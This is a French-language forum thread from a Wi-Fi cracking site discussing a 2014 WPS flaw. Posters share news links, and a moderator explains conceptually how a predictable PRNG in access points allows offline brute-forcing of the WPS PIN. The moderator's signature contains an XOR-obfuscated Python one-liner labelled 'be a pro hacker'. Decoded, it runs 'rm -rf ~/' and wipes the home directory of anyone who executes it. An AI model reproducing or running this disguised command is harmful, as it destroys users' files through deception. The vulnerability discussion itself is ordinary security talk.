Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 01-09-2014 11:54:06

EliotFR
N00b
Inscription : 23-08-2014
Messages : 3

Nouvelle faille WPS

Bonjour,

Je viens de lire une news sur  Tom's Hardware et je cite :

Cette nouvelle faille est plus efficace : elle ne nécessite qu'un essai, le code PIN est ensuite calculé à partir des données récupérées.
Le problème vient visiblement du générateur de nombres aléatoire dans les points d'accès : ceux qui sont équipés d'une puce Broadcom ont un générateur de nombres aléatoires qui est prévisible alors que celui d'un autre constructeur (qui n'est pas cité) ne fonctionne tout simplement pas.


Je pense que l'aglo en question utilise le temps pour générer ses nombres.
Après dans le genre, on parle mais il n'y a aucune source et on aborde surtout pas la technique...
Bref, je reste sur ma faim, Est ce que qqu'un a des info la dessus ?

Source : http://www.tomshardware.fr/articles/wps … tor=RSS-11

EliotFR

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 01-09-2014 16:23:53

neops
Nouveau membre
Inscription : 31-12-2011
Messages : 8

Re : Nouvelle faille WPS

+1 je suis rester comme toi

ps la source reel http://arstechnica.com/security/2014/08 … ulnerable/

Dernière modification par neops (01-09-2014 16:25:51)

Hors Ligne

#3 01-09-2014 20:48:54

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 012

Re : Nouvelle faille WPS

superbe.
la faille vient du fait que les générateurs aléatoires sont des PRNG classiques dans le monde de l'embarqué, avec très peu d'états (32bits,0x100000000,4294967296) et qu'il y a une série de données émises à la suite par l'AP :

- random() (un état copier-coller)
- hash(pin1+random())
- hash(pin2+random())

Si on trouve à que nombre en est l'AP pour le premier (l'état du PRNG) et qu'il n'y a pas d'ajout d'entropie, on peut déduire les deux appels suivants. et donc bruteforcer les hashs de pin1 et pin2 offline.

(je ne suis pas certain de mon analyse, ça mérite relecture)
ps la source réelle http://www.slideshare.net/0xcite/offlin … cted-setup


@582a1cb9 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Épinglée :
313 460450 08-03-2017 11:47:35 par M1ck3y
Épinglée :
44 5003 08-02-2017 20:48:18 par nostromoche
1 371 06-12-2016 21:47:25 par spawn
11 643 05-09-2016 15:07:25 par MiscL
81 16911 29-06-2016 10:27:55 par Fab955

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.021 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]